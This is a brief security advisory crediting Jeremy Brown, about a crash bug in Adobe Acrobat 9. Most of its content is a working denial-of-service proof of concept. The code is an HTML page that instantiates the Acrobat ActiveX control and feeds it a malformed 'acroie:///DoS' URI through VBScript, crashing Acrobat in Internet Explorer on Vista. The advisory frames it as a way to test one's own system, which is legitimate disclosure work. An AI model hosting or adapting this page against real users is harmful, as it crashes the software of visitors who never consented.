|
|
| |
| A vulnerability in Adobe Acrobat 9 allow attackers to cause the program to crash by providing it with a malformed URL, the following exploit can be used to test your system for the mentioned vulnerability. |
| |
Credit:
The information has been provided by Jeremy Brown.
The original article can be found at: http://jbrownsec.blogspot.com/2008/09/adobe-acrobat-9-vista-crash.html
|
| |
Vulnerable Systems:
* Adobe Acrobat 9
Exploit:
<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area -->
<html><body>
<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>
arg1="acroie:///DoS"
target.src = arg1
</script>
</body></html>
|
|
|
